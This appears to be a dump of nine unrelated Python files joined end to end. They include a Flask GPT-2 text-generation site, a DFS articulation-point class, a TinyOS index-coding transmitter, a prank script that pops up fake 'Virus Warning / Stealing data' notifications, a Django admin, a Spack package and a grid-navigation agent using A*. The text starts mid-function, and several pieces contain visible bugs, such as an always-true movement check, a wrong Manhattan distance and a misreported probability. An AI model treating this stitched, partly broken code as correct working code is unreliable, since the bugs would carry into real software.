sentence_similarity_martix = build_similarity_matrix(sentences, stop_words)
# Step 3 - Rank sentences in similarity martix
sentence_similarity_graph = nx.from_numpy_matrix(sentence_similarity_martix)
scores = nx.pagerank(sentence_similarity_graph)
# Step 4 - Sort the rank and pick top sentences
ranked_sentence = sorted(((scores[i],s) for i,s in enumerate(sentences)), reverse=True)
#print("Indexes of top ranked_sentence order are ", ranked_sentence)
for i in range(top_n):
summarize_text.append(ranked_sentence[i][1])
# Step 5 - Ofcourse, output the summarize texr
#print("Summarize Text: \n",textwrap.fill(" ".join(summarize_text), 50))
return(summarize_text)
################################
# _____________________
# | |
# | Code for Generators |
# |____________________ |
#
################################
# for some reason requires double loading
import encoder
# function that removes ending punctuations
def remove_end_punct(string):
reverse_string = string[::-1]
i1 = reverse_string.find('.')
i2 = reverse_string.find('?')
i3 = reverse_string.find('!')
if i1 == -1:
i1 = 1000
if i2 == -1:
i2 = 1000
if i3 == -1:
i3 = 10000
ifinal = min([i1, i2, i3])
return string[:len(string)-ifinal]
## dictionary for model
## def print string given input
def simple_gen_str(input_string, lens, temp, model_choice):
model_name=model_choice
seed=None
raw_text = '\n\n\n\n'+input_string
length=lens
temperature=temp #set to 1.0 for highest diversity
top_k=40 #set to 40
top_p=0.9 #set to 0.9
"""
Interactively run the model
:model_name=117M : String, which model to use
:seed=None : Integer seed for random number generators, fix seed to reproduce
results
:length=None : Number of tokens in generated text, if None (default), is
determined by model hyperparameters
:temperature=1 : Float value controlling randomness in boltzmann
distribution. Lower temperature results in less random completions. As the
temperature approaches zero, the model will become deterministic and
repetitive. Higher temperature results in more random completions.
:top_k=0 : Integer value controlling diversity. 1 means only 1 word is
considered for each step (token), resulting in deterministic completions,
while 40 means 40 words are considered at each step. 0 (default) is a
special setting meaning no restrictions. 40 generally is a good value.
:top_p=0.0 : Float value controlling diversity. Implements nucleus sampling,
overriding top_k if set to a value > 0. A good setting is 0.9.
"""
# produce only a single batch
batch_size = 1
# create encoder based on chosen model
enc = encoder.get_encoder(model_name)
# selects default hyperparameters based on model
hparams = model.default_hparams()
# overrides default hyperparameters with parameters from chosen model
with open(os.path.join('models', model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
# Cannot produce number of tokens more than the hyperparameters count
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join('models', model_name))
# restores model from checkpoint
saver.restore(sess, ckpt)
# encodes input text
context_tokens = enc.encode(raw_text)
#runs session to generate encoded text given encoded raw text
out = sess.run(output, feed_dict={context:
[context_tokens for _ in range(batch_size)]})[:, len(context_tokens):]
#decodes output
text = enc.decode(out[0])
# remove quadruple \n at beginning of text
text = text.replace('\n\n\n\n', ' ')
# remove triple \n at end of text
text = text.replace('\n\n\n', '\n\n')
return(text)
# with model chosen from text similarity or length
def class_gen_str(input_text, T, length, model_dict):
# predicts class of input text
old_class, old_prob = predict_class(input_text)
if length == None:
# text_length
length = min([950, len(word_tokenize(input_text))])
# return new text
new_string = simple_gen_str(input_string = input_text,
lens = length,
temp = T,
model_choice = model_dict[old_class])
# predicts probability of class of new string
new_class, new_prob = predict_class(new_string)
return remove_end_punct(new_string), [old_class, old_prob], [new_class, new_prob]
# with model chosen from text similarity or length
def class_extract_gen_str(input_text, T, length, model_dict):
# predicts class of input text
old_class, old_prob = predict_class(input_text)
if length == None:
# text_length
length = min([950, len(word_tokenize(input_text))])
# summary list of sentences
summ_list = generate_summary_text(text = input_text, top_n=3)
# summary list of strings
summ_string = ' '.join(summ_list)
# return new text
new_string = simple_gen_str(input_string = summ_string,
lens = length,
temp = T,
model_choice = model_dict[old_class])
# predicts probability of class of new string
new_class, new_prob = predict_class(new_string)
# computes cosine similarity
vect = TfidfVectorizer(min_df=1)
tfidf = vect.fit_transform([input_text,new_string])
#remove multiple \n
# new_string = new_string.replace('\n\n\n\n', '')
return remove_end_punct(new_string), [old_class, old_prob], [new_class, new_prob], (tfidf * tfidf.T).A, summ_list
################################
# __________________________
# | |
# | Applications for Site |
# |_________________________|
#
################################
# here's the homepage
#@application.route('/', methods=['POST', 'GET'])
#def homepage():
#
# if request.method == 'POST':
#
# gpu_status = GPU_avail()
#
# return render_template("index.html", gpu_status = gpu_status)
#
# return render_template("index.html")
# here's the homepage
@application.route('/')
def homepage():
return render_template("index.html")
# checks gpu availability
@application.route('/gpu_avail')
def gpu_avail():
gpu_status = GPU_avail()
return jsonify(result = gpu_status)
# dictionary for 345M hparam model
model_dict_345 = {'Science': 'atlantic_science_345',
'Technology': 'atlantic_technology_345',
'Business': 'atlantic_business_345',
'Ideas/Opinion': 'atlantic_ideas_345',
'Education': 'atlantic_education_345',
'International': 'atlantic_international_345',
'Politics': 'atlantic_politics_345',
'Health': 'atlantic_health_345',
'Short Story': 'all_short_stories_345',
'Entertainment': 'atlantic_entertainment_345',
'Gutenberg':'gutenberg_345'}
# dictionary for 117M hparam model
model_dict_117 = {'Science': 'atlantic_science',
'Technology': 'atlantic_technology',
'Business': 'atlantic_business',
'Ideas/Opinion': 'atlantic_ideas',
'Education': 'atlantic_education',
'International': 'atlantic_international',
'Politics': 'atlantic_politics',
'Health': 'atlantic_health',
'Short Story': 'all_short_stories',
'Entertainment': 'atlantic_entertainment',
'Gutenberg':'gutenberg'}
@application.route('/output_gen')
def text_output_gen():
entry_result = request.args.get('user_text')
temp_val = float(request.args.get('temperature'))
topic = request.args.get('topic')
length = int(request.args.get('length'))
model_type = request.args.get('model_type')
# change to 345 model if 345 is in name
if '345' in model_type:
model_dict = model_dict_345
else:
model_dict = model_dict_117
## we begin with \n\n\n\n to indicate that we are going to the start of a text
output_result = simple_gen_str(input_string =entry_result,
lens = length,
temp = temp_val,
model_choice = model_dict[topic] )
# remove end without punctuation
output_result = remove_end_punct(output_result)
# form = cgi.FieldStorage()
# with open ('output_text.txt','w') as fileOutput:
# #fileOutput.write(form.getValue('user_text'))
# fileOutput.write(output_result)
# removes the spontaneous line breaks learned from the corpus
if topic == 'Gutenberg':
output_result = output_result.replace('\n\n','~').replace('\n',' ').replace('~','\n\n')
return render_template("output_gen.html",
model_type = model_type,
output_text= output_result,
entered_text = entry_result,
temp = temp_val,
tops = topic,
lengs = length,
)
@application.route('/output_class_gen')
def text_output_class_gen():
entry_result = request.args.get('user_text')
temp_val = float(request.args.get('temperature'))
length = int(request.args.get('length'))
model_type = request.args.get('model_type')
# change to 345 model if 345 is in name
if '345' in model_type:
model_dict = model_dict_345
else:
model_dict = model_dict_117
## we begin with \n\n\n\n to indicate that we are going to the start of a text
output_result, old_class_probs, new_class_probs = class_gen_str(input_text =entry_result,
length = length,
T = temp_val,
model_dict = model_dict)
# remove end without punctuation
output_result = remove_end_punct(output_result)
# form = cgi.FieldStorage()
# with open ('output_text.txt','w') as fileOutput:
# #fileOutput.write(form.getValue('user_text'))
# fileOutput.write(output_result)
return render_template("output_class_gen.html",
model_type = model_type,
old_class = old_class_probs[0],
old_prob = round(old_class_probs[1]*100, 1),
new_class = new_class_probs[0],
new_prob = round(new_class_probs[1]*100, 1),
output_class_gen_text= output_result,
entered_text = entry_result,
temp = temp_val,
lengs = length,
)
@application.route('/output_class_ex_gen')
def text_output_class_extract_gen():
entry_result = request.args.get('user_text')
temp_val = float(request.args.get('temperature'))
length = int(request.args.get('length'))
model_type = request.args.get('model_type')
if len(sent_tokenize(entry_result)) < 3 :
return render_template("output_class_ex_gen_error.html")
else:
# change to 345 model if 345 is in name
if '345' in model_type:
model_dict = model_dict_345
else:
model_dict = model_dict_117
## we begin with \n\n\n\n to indicate that we are going to the start of a text
output_result, old_class_probs, new_class_probs, similarity, sum_string = class_extract_gen_str(input_text = entry_result,
length = length,
T = temp_val,
model_dict = model_dict)
# remove end without punctuation
output_result = remove_end_punct(output_result)
# form = cgi.FieldStorage()
# with open ('output_text.txt','w') as fileOutput:
# #fileOutput.write(form.getValue('user_text'))
# fileOutput.write(output_result)
return render_template("output_class_ex_gen.html",
output_class_ex_gen_text= output_result,
model_type = model_type,
summary1 = sum_string[0],
summary2 = sum_string[1],
summary3 = sum_string[2],
old_class = old_class_probs[0],
old_prob = round(old_class_probs[1]*100, 3),
new_class = new_class_probs[0],
new_prob = round(old_class_probs[1]*100, 3),
text_sim = similarity[0][1],
entered_text = entry_result,
temp = temp_val,
lengs = length,
)
#@application.route('/contact', methods=['GET', 'POST'])
#def contact():
# form = ContactForm()
#
# if request.method == 'POST':
# return 'Form posted.'
#
# elif request.method == 'GET':
# return render_template('contact.html', form=form)
@application.route('/slides')
def slides():
return render_template("slides.html")
@application.route('/usage')
def usage():
return render_template("usage_tips.html")
@application.route('/about')
def about():
return render_template("about.html")
@application.route('/corpora')
def corpora():
return render_template("corpora.html")
@application.route('/ethics')
def ethics():
return render_template("ethics.html")
@application.route('/index')
def index():
return render_template("index.html")
|
from tiempo import Tiempo
class DFSIterativo(object):
def __init__(self, g, v, visitado):
self.g = g
self.v = v
self.visitado = visitado
self.tiempo_visitado = {}
self.tiempo = Tiempo()
self.predecesor = {}
self.bajo = {}
self.puntos_articulacion = set()
for u in g.devolver_vertices():
self.predecesor[u] = None
def _asignar_visitado(self):
stack = [self.v]
stack_recorrido = [self.v]
while stack:
u = stack.pop()
if self.visitado[u]:
continue
self.visitado[u] = True
self.tiempo.incrementar()
self.tiempo_visitado[u] = self.tiempo.actual()
for w in self.g.adyacentes(u):
if not self.visitado[w]:
stack.append(w)
stack_recorrido.append(w)
self.predecesor[w] = u
return stack_recorrido
def _asignar_bajo(self, stack):
while stack:
u = stack.pop()
self.bajo[u] = self.tiempo_visitado[u]
for w in self.g.adyacentes(u):
if self.tiempo_visitado[w] > self.tiempo_visitado[u]:
if self.bajo[w] >= self.tiempo_visitado[u]:
self.puntos_articulacion.add(u)
self.bajo[u] = min(self.bajo[u], self.bajo[w])
elif w != self.predecesor[u]:
self.bajo[u] = min(self.bajo[u], self.tiempo_visitado[w])
def get_predecesor(self):
return self.predecesor
def get_puntos_articulacion(self):
return self.puntos_articulacion
def hacer_dfs(self):
stack_recorrido = self._asignar_visitado()
self._asignar_bajo(stack_recorrido)
|
#!/usr/bin/python
# python stuff
import time
import sys
import numpy as np
# index coding stuff
from Symbol import Symbol
from alignment import alignment, nullvec
from bs_index_coding import compute_interferers, transmit_messages, bs_decode_messages
from multirandperm import pairingperm
# tos stuff, all needed?
from TxSerialMsg import *
from SymMsg import *
from T2HMsg import *
from AckMsg import *
from tinyos.message import MoteIF
class Transmitter:
def __init__(self, N, B=1, verbose=True, dest=False): #is pieces 1 here?
self.verbose = verbose
self.prevtime = time.time()
self.N = N
#self.A = make_A_matrix(self.N)
self.counter = 0;
self.num_transmissions = 0;
self.current_row = 0;
## Set up link to tos mote
self.mif = MoteIF.MoteIF()
self.source = self.mif.addSource("sf@localhost:9002")
#TxSerialMsg.py is be generated by MIG class
self.mif.addListener(self, TxSerialMsg)
# generate random messages
self.W = np.random.randint(0,2**16, (N,B)) # each message is an array of B uint16s
# store final received messages. goal is to "de-NaN" by the end
self.final_messages = np.nan*np.zeros((N, B))
# keep track of all transmitted and received messages/symbols
self.tx_symbols = np.array([]) # [1 -by- # of transmissions]
# keep track of number of transmissions
self.TOTAL_TRANSMISSIONS = 0
# for TDMA round also?
self.TDMA_TRANSMISSIONS = 0
# antidote matrix A
self.A = np.diag(self.W.reshape(-1)) # receiver (row) i has access to the message it plans to send
# Receiver i wants message dest[i]
# e.g. dest = [1, 0] means R0 wants W[1] and R1 wants W[0]
if dest == False:
self.dest = pairingperm(N)
if self.verbose:
print 'Message destinations chosen by pairing'
print 'dest:', self.dest
else:
self.dest = dest
mat_dest = (np.arange(self.N), np.array(self.dest))
signal_space = np.zeros((self.N,self.N))>0
signal_space[mat_dest] = True;
self.I = compute_interferers(self.A, signal_space)
self.J = self.I.astype(float)
self.J[mat_dest] = -1
self.map = np.arange(self.N)
if self.verbose:
print 'Interferer matrix is:'
print self.J
#send the first tdma packet?
def tdma_stage(self):
smsg = TxSerialMsg()
self.TDMA_MODE = 1;
self.TDleft = np.arange(self.N, dtype=np.uint8)
self.ackList = np.nan*self.TDleft
#test to send something
#smsg.set_messageid(1)
#self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
tm = 0;
#set packet number
while np.any(np.isnan(self.ackList)): #change while to if and call at the end of receive loop?
tm = tm + 1
for i in self.TDleft:
#mote doesnt see any of these??
self.TDMA_TRANSMISSIONS = self.TDMA_TRANSMISSIONS + 1
#smsg.set_crow(255) #something to signal tdma mode, still necessary?
smsg.set_messageid(int(i))
#for(j=len(self.dest[i])) eventually loop through J matrix columns that are -1
smsg.set_data(self.W[self.dest[i]])
#also send own message w[i] for comparison????, set to V_row?
smsg.set_V_row(self.W[i])
smsg.set_current_transmission(self.TDMA_TRANSMISSIONS)
self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
time.sleep(.25) #.125 too fast?
print'TDMA TRANSMISSION ', self.TDMA_TRANSMISSIONS, ': Motes remaining: ', self.TDleft
##call tinyos receive thread instead?
#rmsg = AckMsg(msg.dataGet())
##check for acks, remove nodes with ack type 1 from TDMAleft, record transmissions?
#newAck = rmsg.get_ACKs()
#acklist[newAck==1] = 1
print 'Finished TDMA after ', tm, ' transmissions.' #use tm or get_transmission from receive function? will it make a difference?
def receive(self,src,msg): #make this main_loop and have it call tdma_stage and index_stage?, or set different modes in the other functions
#wait
time.sleep(1)
if self.TDMA_MODE:
print 'RECEIVE FUNCTION (TDMA)'
rmsg = T2HMsg(msg.dataGet())
#check for acks, remove nodes with ack type 1 from TDMAleft, record transmissions?
newAck = rmsg.get_ACKs()
print 'Acks for transmission number ', rmsg.get_transmission(), ': ', newAck
print 'Element equal to 1: ', np.array(newAck)==1 #want this to be an array of logicals
#print self.ackList
self.ackList[np.array(newAck)==1] = 1
#self.ackList[3] = 1
#print self.ackList
self.TDleft = np.nonzero(np.isnan(self.ackList.reshape(-1)))[0] #seems to work
#call tdma_stage(self) at end if np.any(np.isnan(self.ackList)) !
else:
print 'RECEIVE FUNCTION (INDEX CODING)'
rmsgx = T2HMsg(msg.dataGet())
#check for acks, remove nodes with ack type 1 from TDMAleft, record transmissions?
newAck = rmsgx.get_ACKs()
#print 'Acks for transmission number ', rmsgx.get_transmission(), ': ', newAck
#RECEIVE FROM TARGET HERE
##INTERPRET ACKS HERE
#m_i += 1
#i += 1
#self.final_messages = final_messages
# update data structures, and now final messages and unsolved
#self.unsolved = np.array(newAck)!=1
newAck2 = np.array(newAck)
print 'RX ACKS: ' , newAck2
self.unsolved2 = newAck2[self.map] != 1
self.final_messages2 = self.final_messages
self.final_messages2[newAck2==1] = 1
#self.unsolved = self.final_messages != 1
#print 'Rx DEST ', self.dest
print 'Rx NEW UNSOLVED: ', self.unsolved2
print 'Rx NEW finalmessages: ', self.final_messages2
#self.map = np.nonzero(np.isnan(self.final_messages.reshape(-1)))[0]
#self.rx_symbols = self.rx_symbols[self.unsolved, :]
#self.J = self.J[self.unsolved, :]
#self.I = self.I[self.unsolved, :]
#self.A = self.A[self.unsolved, :]
#call compute_matrices, send to all motes at end if np.any(np.isnan(self.final_messages)), or is it if np.all(self.unsolved) and m_i < m??
def main_loop(self): #change to compute_matrixes
smsgx = TxSerialMsg()
self.TDMA_MODE = 0;
eps_vec = .5*np.ones(self.N)
i = 1
while np.any(np.isnan(self.final_messages)):
Kprime = len(self.map);
if self.verbose:
print 'Remaining ', Kprime, ' nodes are: '
print self.map
## special case for one remaining node
if Kprime == 1:
self.TOTAL_TRANSMISSIONS += 1
while not transmit_messages(1, eps_vec[self.map]):
self.TOTAL_TRANSMISSIONS += 1
self.final_messages[self.map] = self.W[self.map]
else:
## Generate next m transmissions
(V, U) = alignment('mixed', self.J, 1e-4, 100, False)
m = np.shape(V)[0]
if self.verbose:
print 'Minimum rank is ', m
# generate next symbol based on current V
L = len(self.tx_symbols);
if i == 1:
L = 0
self.unsolved = np.ones(Kprime) > 0
m_i = 0
while np.all(self.unsolved) and m_i < m:
self.tx_symbols = np.append(self.tx_symbols, Symbol(V[m_i,:], self.W, self.map))
R = transmit_messages(1, eps_vec[self.map])
if i == 1:
self.rx_symbols = R
else:
self.rx_symbols = np.bmat([self.rx_symbols, R])
if self.verbose:
print 'Transmission ', m_i+1, '/', m
print self.rx_symbols.astype(int)
self.TOTAL_TRANSMISSIONS += 1
# solve for messages if possible
(self.unsolved, final_messages) = bs_decode_messages(self.dest, Kprime, self.map,
self.rx_symbols, self.tx_symbols, self.A, self.I, self.J, self.W, self.final_messages, self.verbose)
time.sleep(.2)
print 'UNSOLVED: ', self.unsolved
print 'MAP: ' , self.map
#SEND TO TARGET HERE, rewrite these lines
#smsg.set_crow
print 'tx map ', self.map
smsgx.set_messageid(255) #now something to represent index coding, 255?
smsgx.set_data(np.dot(V[m_i],self.W,))
##also send own message w[i] for comparison????
smsgx.set_V_row(V[m_i])
smsgx.set_current_transmission(self.TOTAL_TRANSMISSIONS)
self.mif.sendMsg(self.source, 0xFFFF, smsgx.get_amType(), 0, smsgx)
#time.sleep(1) #.125 too fast?
#INTERPRET ACKS IN RECEIVE FUNCTION
m_i += 1
i += 1
self.final_messages = final_messages #still need final messages??
# update data structures
self.map = np.nonzero(np.isnan(self.final_messages.reshape(-1)))[0]
self.rx_symbols = self.rx_symbols[self.unsolved, :]
self.J = self.J[self.unsolved, :]
self.I = self.I[self.unsolved, :]
self.A = self.A[self.unsolved, :]
if self.verbose:
print 'Total number of transmissions: ', self.TOTAL_TRANSMISSIONS
return self.TOTAL_TRANSMISSIONS
# Called by the MoteIF's receive thread when a new message
# is received
#def receive(self, src, msg):
#time.sleep(1)
#m = DecodedMsg(msg.dataGet())
#self.counter = m.get_counter()
#timeformat = '%Y/%d/%m %H:%M:%S'
#print 'Received message %s: counter: %d' % (time.strftime(timeformat), self.counter)
#print ' current row: ', m.get_current_row()
#print ' true current row: ', self.current_row
#z = np.array(m.get_V_row())
#z = z[0:self.current_row+1]
#print z
#V = self.A[:m.get_current_row()+1]
##U, S, W = np.linalg.svd(V.T)
##print S
#Vnull = V[ :, [1,3,5,7] ]
##U,S,V = np.linalg.svd(Vnull.T)
##print S
#print np.matrix(Vnull).T*np.matrix(z).T
##U, s, W = np.linalg.svd(Vnull.T)
##print W.T
##print self.A[m.get_current_row()][:]
##print m.get_current_row()
##print S
##V_null = self.A[0:self.current_row+1,[1,3, 9, 14]]
##U, S, W = np.linalg.svd(V_null)
##print S
##if m.get_perform_svd() == self.N:
###print ' svd received:'
##Svals = m.get_W()
##print 'Rx svd: ', Svals
##U,S,V = np.linalg.svd(self.A)
###S = [s**2 for s in S]
###print ' svd check:'
##print 'PC svd: ', S
##self.perform_svd = 0
##self.A = make_A_matrix(self.N)
##print 'MSE: ', np.linalg.norm(np.array(S)-np.array(Svals),2)
##proctime = time.time() - self.prevtime
##print 'Elapsed time: %f seconds' % proctime
##else:
##self.prevtime = time.time()
##self.perform_svd += 1
#self.counter += 1
#self.current_row = (self.current_row + 1) % self.N
##if self.current_row == 0:
##self.A = make_A_matrix(self.N)
#self.send()
#uncomment this?? is it still useful?
def send(self,m_i):
smsg = TxSerialMsg()
#smsg.set_counter(self.counter)
smsg.set_crow(self.current_row)
#smsg.set_V_row(self.A[self.current_row])
smsg.set_V_row(V[m_i,:])
smsg.set_data(self.tx_symbols[:,m_i])
Symbol(V[self.current_row,:], self.W, self.map)
smsg.set_data(self.sym[self.current_row])
self.mif.sendMsg(self.source, 0xFFFF, smsg.get_amType(), 0, smsg)
#TDMA round, send message j to mote self.dest[j]
#def make_A_matrix(N):
#A = np.random.randn(N,N)
#B = np.matrix(np.random.randn(4,4))
#U, s, W = np.linalg.svd(B)
#s[-1] = 0
#B = np.array(U*np.diag(s)*W)
#
#
#A[0:4,1] = B[:,0]
#A[0:4,3] = B[:,1]
#A[0:4,5] = B[:,2]
#A[0:4,7] = B[:,0]
##print A
#
#
#
#return A
if __name__ == "__main__":
print "Running"
np.set_printoptions(precision=3)
np.set_printoptions(suppress=True)
if len(sys.argv) > 1:
N = int(sys.argv[1])
else:
N = 6
m = Transmitter(N, verbose=True)
m.tdma_stage()
m.main_loop()
time.sleep(1)
#m.send()
|
from win10toast import ToastNotifier
toaster = ToastNotifier()
for i in range(10):
toaster.show_toast("Virus Warning","Stealing data",icon_path="favicon.ico",duration=2)
toaster.show_toast("Example two","This notification is in it's own thread!",icon_path=None,duration=2,threaded=True)
|
from django.contrib import admin
from import_export.admin import ImportExportModelAdmin
from .models import Organization
from .resources import OrganizationResource
@admin.register(Organization)
class OrganizationAdmin(ImportExportModelAdmin):
list_display = [
'code',
'name',
]
model = Organization
resource_class = OrganizationResource
|
from .effunet import EffUnet
from .unext import UneXt50
from .emanet import EMANet
|
# Write a program which accepts a sequence of comma-separated numbers from
# console and generate a list and a tuple which contains every number.
# Suppose the following input is supplied to the program:
# 34,67,55,33,12,98
# Then, the output should be:
# ['34', '67', '55', '33', '12', '98']
# ('34', '67', '55', '33', '12', '98')
def trim(x):
return x.strip()
string = input('Provide me numbers (sepparated by comma): ')
numbers = string.split(',')
numbers = list(map(trim, numbers))
print(numbers)
|
from spack import *
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class Lwtnn(CMakePackage):
homepage = "http://www.example.com"
url = "https://github.com/lwtnn/lwtnn/archive/v1.0.tar.gz"
version('2.4', 'e323debb51fdd251e7f74238f757a952')
version('1.0', 'bb62cd8c1f0a97681206894f7f5a8e95')
depends_on('boost')
depends_on('eigen')
depends_on('cmake', type='build')
def setup_environment(self, spack_env, run_env):
spack_env.set('BOOST_ROOT', self.spec['boost'].prefix)
spack_env.set('EIGEN_ROOT', self.spec['eigen'].prefix)
def cmake_args(self):
args= (
'-DCMAKE_CXX_COMPILER=g++',
'-DCMAKE_CXX_FLAGS=-fPIC',
'-DCMAKE_BUILD_TYPE=Release',
'-DBUILTIN_BOOST=OFF',
'-DBUILTIN_EIGEN=OFF')
return args
|
#!/usr/bin/python3
# ^^ note the python directive on the first line
# COMP 9414 agent initiation file
# requires the host is running before the agent
# designed for python 3.6
# typical initiation would be (file in working directory, port = 31415)
# python3 agent.py -p 31415
# created by Leo Hoare
# with slight modifications by Alan Blair
import copy
import sys
import socket
# declaring visible grid to agent
view = [['' for _ in range(5)] for _ in range(5)]
obstacle = ['T']
water = ['~']
pickable = ['a', 'k', 'o', '$', ' ']
mapping_table = {(0, 1, '^'): ['r', 'f'], (0, 1, '>'): ['f'], (0, 1, 'v'): ['l', 'f'], (0, 1, '<'): ['l', 'l', 'f'],
(0, -1, '^'): ['l', 'f'], (0, -1, '>'): ['l', 'l', 'f'], (0, -1, 'v'): ['r', 'f'], (0, -1, '<'): ['f'],
(1, 0, '^'): ['l', 'l', 'f'], (1, 0, '>'): ['r', 'f'], (1, 0, 'v'): ['f'], (1, 0, '<'): ['l', 'f'],
(-1, 0, '^'): ['f'], (-1, 0, '>'): ['l', 'f'], (-1, 0, 'v'): ['l', 'l', 'f'], (-1, 0, '<'): ['r', 'f']}
get_direction = {(0, 1): '>', (0, -1): '<', (1, 0): 'v', (-1, 0): '^'}
class Node:
def __init__(self, value, point):
self.value = value
self.point = point
self.parent = None
self.visited = False
self.H = 0
self.G = 0
def move_cost(self, other):
return 0 if self.value == '.' else 1
class Agent:
def __init__(self):
self.inventory = {'a':False, 'k':False, '$':False, 'r':0, 'o':0}
self.axe_location = []
self.key_location = []
self.stepping_stone = []
self.space_location = []
self.water_location = []
self.tree_location = []
self.gold_location = []
self.door_location = []
self.unvisitedwater = []
self.unvisited = [] # use to stored all the walkable but unvisited cells
self.agent_x = 80
self.agent_y = 80
self.direction = '^' # Always consider the agent direction is '^'
self.grid = [[ '?' for i in range(160)] for j in range(160)] # create a 2d list that store all the Node objects
for x in range(len(self.grid)):
for y in range(len(self.grid[x])):
self.grid[x][y] = Node(self.grid[x][y], (x, y))
self.pending_move = [] # list to store the pending moves
# Helper function
def rotate(self, view, time): # rotate 2d list clockwise
for _ in range(time):
temp = zip(*view[::-1]) # return a list of tuples
view = [list(elem) for elem in temp] # convert list of tuples to list of lists
return view
# helper function
def can_move(self):
node = self.get_front_tail()
if node.value in pickable or obstacle:
return True
return False
def print_list(self, input_list):
print('\n'.join(map(''.join, input_list)))
# the the cell in front of agent
def get_front_tail(self): # get the grid in front the agent
if self.direction == '^':
x = self.agent_x - 1
y = self.agent_y
elif self.direction == '>':
x = self.agent_x
y = self.agent_y + 1
elif self.direction == 'v':
x = self.agent_x + 1
y = self.agent_y
else:
x = self.agent_x
y = self.agent_y - 1
return self.grid[x][y]
#######################################################################################
########## Line 95 to Line 170, Update the self.grid list from view and from move
#######################################################################################
def update_from_view(self, view):
# Rotate the view based on which direction the agent is facing
if self.direction == '>':
view = self.rotate(view, 1)
if self.direction == 'v':
view = self.rotate(view, 2)
if self.direction == '<':
view = self.rotate(view, 3)
self.grid[self.agent_x][self.agent_y].visited = True
self.grid[self.agent_x][self.agent_y].value = self.direction
# Iterate through the view and update the internal map
for i in range(5):
for j in range(5):
x = self.agent_x - (2 - i)
y = self.agent_y + (j - 2)
self.grid[x][y].value = view[i][j]
# stored all adjacent cells which can actually walk through
if view[i][j] in pickable:
if (i == 1 and j == 2) or (i == 2 and j == 1) or (i == 2 and j == 3) or (i == 3 and j == 2):
if (x, y) not in self.unvisited and self.grid[x][y].visited == False:
self.unvisited.append((x, y))
if view[i][j] == '~':
if (i == 1 and j == 2) or (i == 2 and j == 1) or (i == 2 and j == 3) or (i == 3 and j == 2):
if (x, y) not in self.unvisitedwater and self.grid[x][y].visited == False:
self.unvisitedwater.append((x, y))
if view[i][j] == 'a' and (x, y) not in self.axe_location:
self.axe_location.append((x, y))
if view[i][j] == 'k' and (x, y) not in self.key_location:
self.key_location.append((x, y))
if view[i][j] == 'o' and (x, y) not in self.stepping_stone:
self.stepping_stone.append((x, y))
if view[i][j] == ' ' and (x, y) not in self.space_location:
self.space_location.append((x, y))
if view[i][j] == '~' and (x, y) not in self.water_location:
self.water_location.append((x, y))
if view[i][j] == 'T' and (x, y) not in self.tree_location:
self.tree_location.append((x, y))
if view[i][j] == '$' and (x, y) not in self.gold_location:
self.gold_location.append((x, y))
if view[i][j] == '-' and (x, y) not in self.door_location:
self.door_location.append((x, y))
print('At this stage, the agent direction is: ' + self.direction)
print("At this moment, the agent coordinate is: ({0}, {1})".format(self.agent_x, self.agent_y))
print('The unvisited list is: {0}'.format(self.unvisited))
def update_from_move(self, move):
front = self.get_front_tail() # get the grid in front
x, y = front.point
move = move.upper() # Convert to upper case
# if move == 'F':
# if front in ['*', '-', 'T']: # Do nothing
# return
# self.agent_x, self.agent_y = x, y # update the agent's location
# if front == 'a':
# self.axe_location.remove((x, y))
# self.inventory['a'] = True
# if front == 'k':
# self.key_location.remove((x, y))
# self.inventory['k'] = True
# if front == '$':
# self.gold_location.remove((x, y))
# self.inventory['$'] = True
# if front == 'o':
# self.stepping_stone.remove((x, y))
# self.inventory['o'] += 1
# if front == '~':
# if self.inventory['o'] <= 0 and self.inventory['r']:
# self.inventory['r'] == False
# if self.inventory['o'] >= 1:
# self.inventory['o'] -= 1
# self.water_location.remove((x, y))
if move == 'C':
self.inventory['r'] += 1
if move == 'U':
self.inventory['k'] -= 1
if self.get_front_tail().value == '~' and self.grid[x][y].value == ' ':
self.inventory['r'] -= 1
#######################################################################################
############ Line 176 to Line 237, A* algorithm #############################
#######################################################################################
def children(self, node):
x, y = node.point
result = []
for r, c in [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]:
if r >= 0 and r < len(self.grid[0]) and c >= 0 and c < len(self.grid) and self.grid[r][c].value in pickable:
result.append(self.grid[r][c])
elif self.inventory['a'] == True:
if r >= 0 and r < len(self.grid[0]) and c >= 0 and c < len(self.grid) and self.grid[r][c].value in obstacle:
result.append(self.grid[r][c])
# need to change the below statement to accept water as a path result
# elif len(self.unvisited) == 0 and (self.inventory['r'] > 0 or self.inventory['o'] > 0):
# if r >= 0 and r < len(self.grid[0]) and c >= 0 and c < len(self.grid) and self.grid[r][c].value in water:
# result.append(self.grid[r][c])
return result
def manhattan(self, a, b):
return abs(a.point[0] - b.point[0]) + abs(a.point[1] - b.point[0])
def clean_up(self):
for row in self.grid:
for item in row:
item.parent, item.G, item.H = None, 0, 0
# this A star algorithm is adapted from https://gist.github.com/jamiees2/5531924
# with slightly modify to server our purpose
def aStar(self, start, goal): # each grid element is a node object
self.clean_up()
openset = set() # The open set
closedset = set() # The closed set
current = start # Current point is the starting point
openset.add(current) # Add the starting point to the open set
while openset: # While the open set is not empty
current = min(openset, key=lambda o:o.G + o.H)
if current.point == goal.point:
path = []
while current.parent:
current.visited = True
path.append(current.point)
current = current.parent
path.append(current.point)
current.visited = True
return path[::-1]
openset.remove(current) # Remove the item from the open set
closedset.add(current) # Add it to the closed set
for node in self.children(current):
if node in closedset: # If it is already in the closed set, skip it
continue
if node in openset: # Otherwise if it is already in the open set
new_g = current.G + current.move_cost(node)
if node.G > new_g:
node.G = new_g
node.parent = current
else:
node.G = current.G + current.move_cost(node)
node.H = self.manhattan(node, goal)
node.parent = current # Set the parent to our current item
openset.add(node) # Add it to the set
return None # return None if no path is found
# if the self.unvisited list is not empty, means there are still some nodes that agent didn't go to.
